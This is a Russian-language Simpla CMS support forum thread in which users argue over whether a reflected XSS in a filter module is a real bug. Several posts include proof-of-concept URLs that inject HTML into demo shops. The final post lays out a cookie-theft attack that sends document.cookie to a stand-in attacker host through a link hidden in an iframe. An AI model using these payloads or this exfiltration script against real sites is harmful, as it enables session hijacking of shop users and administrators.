Перейти к содержанию
Официальный форум поддержки Simpla

Рассудите пожалуйста


Рекомендуемые сообщения

По модулю от sell-studio мультифильтр, я нашел БАГ XSS атака:

http://simpla.sell-workshop.ru/filter/catalog/mobilnye-telefony?min_price=0&max_price=%22%3E%3Ca%20href=%22http://teplotorg.com.ua/%22%3E%D0%9C%D0%BE%D1%8F%20%D1%81%D1%81%D1%8B%D0%BB%D0%BA%D0%B0%3C/a%3E

 

Обратите внимание на ссылку под фильтром цен

 

Благодаря ему, можно вставлять любой HTML код на страницу, в т.ч. и ссылки, как утверждает автор:

Денис, Вы сильно гордый, чтобы признать
[0:03:26] Андрей Ли: что можете допустить ошибку
[0:03:37] Андрей Ли: Смотрите
[0:03:40] Андрей Ли: ОШИБКУ СВОЮ
[0:03:46] Андрей Ли: http://simpla.sell-workshop.ru/filter/catalog/mobilnye-telefony?min_price=0&max_price=0%22%3E%3Cinput%20type=%22text%22%20value=%22%D0%AD%D0%A2%D0%9E%20%D0%9D%D0%95%20%D0%91%D0%90%D0%93%20%D0%9D%D0%90%D0%92%D0%95%D0%A0%D0%9D%D0%9E%D0%95%22%20style=%22position:absolute;width:500px%20!important;height:500px;font-size:30px%22%3E
[0:03:53] Андрей Ли: Если считаете что это не баг
[0:04:00] Андрей Ли: то увы я умываю руки сударь
[0:04:07] sell-studio: ахахахаха
[0:04:15] Андрей Ли: xss это ахахаха?
[0:04:21] sell-studio: вот как раз это не баг
[0:04:28] Андрей Ли: 
[0:04:40] Андрей Ли: ТОбишь это нормально, что я могу менять содержимое вашей страницы?
[0:04:45] sell-studio: так вы уж определитесь что это  инекция мускула или xss
[0:04:56] Андрей Ли: XSS это по вашему ерунда?
[0:06:15] sell-studio: вывод html тего возмоожен на многих крупных сайтах ну это так не чего
[0:06:30] Андрей Ли: Денис, вы заблуждаетесь
[0:06:58] Андрей Ли: это XSS с помощью котороо я могу вставить свою ссылку на сайт и она будет внешней, таким образом многие сайты ушатали

Как вы считаете? Это БАГ достойный внимания или все таки ерунда... ?

post-16962-0-63979200-1397596847_thumb.jpg

Ссылка на сообщение
Поделиться на другие сайты

sell-studio кто такие ? 
они бы что свое придумали  :)
 

А про баг, да. Увы так бывает даже у опытных прогеров - недостаточная фильтрация данных, но после 
предъявления бага становится ясно, кто есть кто (школота или добросовестный человек )

Ссылка на сообщение
Поделиться на другие сайты

sell-studio кто такие ? 

они бы что свое придумали  :) 

 

А про баг, да. Увы так бывает даже у опытных прогеров - недостаточная фильтрация данных, но после предъявления бага становится ясно, кто есть кто (школота или добросовестный человек )

Подставте в свой модуль фильтра в адресную строку: ?min_price=&max_price=">ТРУЛЯЛЯЛЯЛЯ<input%20type="hidden"

Ссылка на сообщение
Поделиться на другие сайты

К сожалению, этому мало кто уделяет внимание, а ведь ворованные куки и сессия может дать доступ в админ часть интернет-магазина ; )

Ссылка на сообщение
Поделиться на другие сайты

Подставте в свой модуль фильтра в адресную строку: ?min_price=&max_price=">ТРУЛЯЛЯЛЯЛЯ<input%20type="hidden"

да, там проверки не хватает в шаблоне. На последних проектах ето было исправленно, а демке решил сейчас исправить. 

 

А может парни из селл-студиа мою работу и спионерили ?  :)  :)  :)  часть так точно спионерели, скорее всего и пхп код, но судя по всему старую версию (там где мне самому не нравился код )

Ссылка на сообщение
Поделиться на другие сайты

obsen глубоко ошибаетесь...

 

Фильтрация стояла на get но не отрабатывала...

 

Своё придумали?

Узнаёте http://www.21vek.by/washing_machines/

 

Вашего тут только ajax да и то он даже не ваш.

 

Впервые термин AJAX был публично использован 18 февраля 2005 года в статье Джесси Джеймса Гарретта (Jesse James Garrett) «Новый подход к веб-приложениям»[3]. Гарретт придумал термин, когда ему пришлось как-то назвать новый набор технологий, предлагаемый им клиенту.


Однако в той или иной форме многие технологии были доступны и
использовались гораздо раньше, например в подходе «Remote Scripting»,
предложенном компанией Microsoft в 1998 году, или с использованием HTML элемента IFRAME, появившегося в Internet Explorer 3 в 1996 году.


AJAX стал особенно популярен после использования его компанией Google в сервисах Gmail, Google Maps и Google Suggest.

 

P.S. всем мира

Ссылка на сообщение
Поделиться на другие сайты

"Фильтрация стояла на get но не отрабатывала..." - если стояла значит обрабатывать должно, если не стояла значит не обрабатывает.

Вас как то не понимаю. Может Вы имели ввиду что в View вы проверяте параметры на integer для того что добавить в $filter['max_price'] но при етом в tpl Вы используете $smarty.get.max_price   ?  

Про диз я Вам нечего не говорил, а вот то что часть js спионерили, а не AJAX который придумал Джесси  ;) 

 

Ссылка на сообщение
Поделиться на другие сайты

Это не баг. Такое можно сделать с любым html кодом с помощью оперы. 

http://ybex.com/d/jufj66b9zlaz3ybvc96eu7y7z6z6i7mzuauq6koe.html

 

Вопрос заключается только в том как обрабатываются эти запросы на сервере.

Если просто прямо идут как строка в запрос к БД. То это уже уязвимость... Можно делать SQL иньекции

Ссылка на сообщение
Поделиться на другие сайты

чет я сомневаюсь что подобными манипуляциями можно вставить что то в базу. зачем мучатся со всякими ссылками, манипуляциями - цель ведь в том что бы поглумиться. Ну так сделайте себе скриншот чужого сайта и нарисуйте там чего хотите если это приводит вас к экстазу)))

 

так ведь далеко пойти можно

http://demo.simplacms.ru/catalog/miksery?2=%22%3E%3Ca%20href=%22http://teplotorg.com.ua/%22%3E%D0%9C%D0%BE%D1%8F%20%D1%81%D1%81%D1%8B%D0%BB%D0%BA%D0%B0%3C/a%3E

 

http://demo.simplacms.ru/catalog/miksery?2=%22%3E%EC%EE%FF%20%F1%F1%FB%EB%EA%E0%3C%22

Ссылка на сообщение
Поделиться на другие сайты

чет я сомневаюсь что подобными манипуляциями можно вставить что то в базу. зачем мучатся со всякими ссылками, манипуляциями - цель ведь в том что бы поглумиться. Ну так сделайте себе скриншот чужого сайта и нарисуйте там чего хотите если это приводит вас к экстазу)))

 

так ведь далеко пойти можно

....

 

 

Вам наверное не знаком термин "xss атака" и её возможные последствия.

Ссылка на сообщение
Поделиться на другие сайты

а вы продемонстрируйте, что бы было понятнее.

 

вот есть сайт simpla.sell-workshop.ru вы ЗНАТОК xss атак - вот и продемонстрируйте возможности

Ссылка на сообщение
Поделиться на другие сайты

[0:04:40] Андрей Ли: ТОбишь это нормально, что я могу менять содержимое вашей страницы?
[0:04:45] sell-studio: так вы уж определитесь что это инекция мускула или xss

 

Для того что бы менять содержимое надо воткнуть свой хлам в базу. Вы и сами то не знаете что хотите сделать  подменить содержимое или продемонстрировать xss. Что вы можете менять? Какое содержимое? Относительно своего браузера меняйте что хотите...

[0:06:58] Андрей Ли: это XSS с помощью котороо я могу вставить свою ссылку на сайт и она будет внешней, таким образом многие сайты ушатали

 

Какие сайты? Можно примеры? Как ушатали, что за сайты?

 

Вы подняли тему, решили просветить форумчан, ознакомить с термином "xss атака". Но пока мне объективно  видно что кроме термина вы не показали ничего серьезного. Ничего серьезного в детской забаве которую вы продемонстрировали лично я не увидел.

 

вот впишите в индексный файл свое содержимое или добавьте в базу что либо посредством той дыры которую обнаружили, тогда я с вами соглашусь...

Ссылка на сообщение
Поделиться на другие сайты

Благодаря xss я могу получить доступ к админ панели магазина к примеру, заполучив ваши куки и сессию! Или это фигня по вашему?

Ссылка на сообщение
Поделиться на другие сайты

Благодаря xss я могу получить доступ к админ панели магазина к примеру, заполучив ваши куки и сессию! Или это фигня по вашему?

 

продемонстрируйте, потом поговорим фигня это или нет

Ссылка на сообщение
Поделиться на другие сайты

Wizard откройте Google поищите что такое XSS, и что с помощью него можно сделать и как это делается. Почему я должен Вас учить или разъяснять?

Ссылка на сообщение
Поделиться на другие сайты

По-моему, вам пытаются намекнуть, что подставить джаваскриптом что-то из инпута на страницу, и провести атаку - немного разные вещи...

Ссылка на сообщение
Поделиться на другие сайты

Модератор закрой тему. Вопрос решился. Баг исправили. Объяснять кому либо, что такое xss, как им пользоваться и его последствия я не намерен, для этого есть статьи, к примеру здесь: http://blackhack.ru/showthread.php?t=178

Ссылка на сообщение
Поделиться на другие сайты

cernos я например знаю что такое XSS атака. Я еще в школе участвовал в хаке 1 форума по данному принципу.

То что вы навели - это не страшно и особого вреда не нанесет.  

Таких мест в коде любой кмс может быть навалом.

Это может быть опасно только в одном случае: если вы сгенерируете ссылку при заходе на какую откроется что то типа окна ввода логина и пароля. Затем нужно что бы администратор (жертва) прошел по данной ссылке и ошибшись ввел свои данные которые в свою очередь передались на ваш сервер. Но тут еще есть ограничения на длину GET (примерно 256-1024байт) то есть не факт что все что нужно сюда влезет... 

Существует намного проще способ для данного действия. Делается через обычный смайлик, в какой нибудь форме для коммента например (но это при учете что допускается дальнейший вывод изображений с сообщений)

Ссылка на сообщение
Поделиться на другие сайты

# osben

Увы так бывает даже у опытных прогеров
Это точно. Все мы люди, от такого не застрахованы ни супер опытные, ни начинающие. Как и не может быть абсолютно неуязвимой CMS, человеческий фактор когда-нибудь выплывет.
# yr4ik

Это не баг. Такое можно сделать с любым html кодом с помощью оперы.
...ybex.com/d/ju...mzuauq6koe.html
Вопрос заключается только в том как обрабатываются эти запросы на сервере.
Вопрос в том, как уязвимость будет использована атакующим. Я вижу как минимум 4 способа. Специалист по безопасности наверняка назовет еще несколько, о которых мы даже не подумали бы.
# Wizard

чет я сомневаюсь что подобными манипуляциями можно вставить что то в базу
Не сомневайтесь, можно. Главное здесь - глубокое знание принципов атаки и умение мыслить глобальнее, чем рядовые программисты.
# Wizard

Ничего серьезного в детской забаве которую вы продемонстрировали лично я не увидел.
Если к теме безопасности вы не имеете отношения, конечно ничего не увидите. Для этого надо быть в теме.
# yr4ik

Это может быть опасно только в одном случае: если вы сгенерируете ссылку при заходе на какую откроется что то типа окна ввода логина и пароля.
Это может быть опасно как минимум в 4 случаях: стандартная кража куков, кража ТИЦ, атака на выброс конкурента из индекса, атака на исполнение скриптов от имени админа.

 

-------------------------------

 

P.S. Наблюдение. Симпла - легкий движок, удобный для начинающих. Однако ее же легкость играет злую шутку в виде вовлечения в среду разработки большого процента посредственных специалистов. Скажем так, проблема эта известна всем движкам, но в Симпле она весьма заметна. В итоге к природным уязвимостям движка прибавляется масса дырок, опасных и не очень, заметных и затаившихся, порожденных этими специалистами. Если уж ошибка замечена, лучше исправить, потому что ваших знаний вряд ли хватит, тем более в сфере безопасности, чтобы рассуждать о возможных последствиях ошибки.

Ссылка на сообщение
Поделиться на другие сайты

cernos: Благодаря xss я могу получить доступ к админ панели магазина к примеру, заполучив ваши куки и сессию! Или это фигня по вашему?

 

Wizard: продемонстрируйте, потом поговорим фигня это или нет

 

cernos: Wizard откройте Google поищите что такое XSS, и что с помощью него можно сделать и как это делается. Почему я должен Вас учить или разъяснять?

 

cernos вы сами взялись учить и разъяснять, иначе для чего вы подняли эту тему. Мне искренне интересно как злоумышленники могут навредить сайту и как с этим бороться, я подумал что вы специалист, вот думаю ща научит и покажет что к чему.

 

Вы никому ничего не должны, вы просто пустозвон... Вы можете задавать вопросы по поводу безопасности в которой сами ничего не смыслите.

 

aimatrix: Не сомневайтесь, можно. Главное здесь - глубокое знание принципов атаки и умение мыслить глобальнее, чем рядовые программисты.

 

Можно и сайт пентагона взломать

 

Вопрос в том, что оговаривается какая то проблема, но реальных примеров НЕТ. Для того что бы квалифицированно вести речь о безопасности необходимо в этом хоть образно что то понимать или как минимум что бы тут присутствовал хоть один специалист который мог бы внятно объяснить на примерах что к чему, погуглить не достаточно.

 

на данный момент, лично для меня, поднятая "проблема" до сих пор остается всего лишь детской шалостью.

 

Вот Денис (pikusov) исправил тот МЕГА баг который нашелся в ходе нашей дискуссии. Может он объяснит как можно навредить сайту посредством данной уязвимости или как минимум КАКИЕ ЖЕ ВСЕ ТАКИЕ последствия ждут пользователей у которых более ранняя версия.

Ссылка на сообщение
Поделиться на другие сайты

Если уж ошибка замечена, лучше исправить, потому что ваших знаний вряд ли хватит, тем более в сфере безопасности, чтобы рассуждать о возможных последствиях ошибки.

 

Так если у посредственных специалистов не достаточно знаний в сфере безопасности как они могут знать об ошибках которые приведут к взлому для того что бы их предотвратить)))))))))))))

 

Вы рассуждаете не о безопасности - это ПАРАНОЯ

 

В вашем коде, в ранней версии, сейчас не знаю, я вообще видел защиту от DDOS!!!! Защита от DDOS на уровне PHP!!!   :o  :o  :o это нонсенс!! Совсем не удевительно что вас заинтересовала данная тема.  :ph34r:

 

PS:Посредственных программистов, верстальщиков, дизайнеров и обычных пустозвонов достаточно везде, дело не в cms. Симпла УНИКАЛЬНАЯ CMS с простым, логичным кодом - она подойдет как для крутого специалиста так и для рядового пользователя. Вопрос только в целях и задачах. Ничего лучше в данном сегменте нет.

Ссылка на сообщение
Поделиться на другие сайты

cernos: Благодаря xss я могу получить доступ к админ панели магазина к примеру, заполучив ваши куки и сессию! Или это фигня по вашему?

 

Wizard: продемонстрируйте, потом поговорим фигня это или нет

 

cernos: Wizard откройте Google поищите что такое XSS, и что с помощью него можно сделать и как это делается. Почему я должен Вас учить или разъяснять?

 

cernos вы сами взялись учить и разъяснять, иначе для чего вы подняли эту тему. Мне искренне интересно как злоумышленники могут навредить сайту и как с этим бороться, я подумал что вы специалист, вот думаю ща научит и покажет что к чему.

 

Вы никому ничего не должны, вы просто пустозвон... Вы можете задавать вопросы по поводу безопасности в которой сами ничего не смыслите.

 

aimatrix: Не сомневайтесь, можно. Главное здесь - глубокое знание принципов атаки и умение мыслить глобальнее, чем рядовые программисты.

 

Можно и сайт пентагона взломать

 

Вопрос в том, что оговаривается какая то проблема, но реальных примеров НЕТ. Для того что бы квалифицированно вести речь о безопасности необходимо в этом хоть образно что то понимать или как минимум что бы тут присутствовал хоть один специалист который мог бы внятно объяснить на примерах что к чему, погуглить не достаточно.

 

на данный момент, лично для меня, поднятая "проблема" до сих пор остается всего лишь детской шалостью.

 

Вот Денис (pikusov) исправил тот МЕГА баг который нашелся в ходе нашей дискуссии. Может он объяснит как можно навредить сайту посредством данной уязвимости или как минимум КАКИЕ ЖЕ ВСЕ ТАКИЕ последствия ждут пользователей у которых более ранняя версия.

 

Баг, который был в симпле, не критичен, как тот, который был в модуле, с которого начался разговор. Так как в симпле баг случается только в редких случаях (PHP < 5.3, включены ворнинги) а так же не позволял добавить скрипт на страницу.

А в модуле баг был действительно критичный, и продемонстрировать его я даже собирался на живом примере специально для вас, но баг уже исправили, так что опишу пример словами:

1) указываем в URL такие данные, чтобы на страницу сайта добавился примерно такой код: <script>document.write(

"myhackersite.com/savecookies.php?cookie=" + document.cookies );</script>

2) Эту ссылку отправляем жертве, чьи куки хотим украсть. Чтобы не палиться, можем создать фейковую страницу "с веселыми котиками", в скрытом фрейме указав этот адрес.

3) Как только жертва откроет эту ссылку, наш php-скрипит из первого пункта получит её куки и отправит их нам, например, на email

4) Заходим под куками жертвы в магазин, и мы оказываемся залогинены под ним.

 

Конечно, в данном случае, максимум, чем мы можем навредить жертве, это посмотреть историю его заказов, просмотров товаров и состояние корзины, но всё-равно неприятно.

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

Загрузка...
×
×
  • Создать...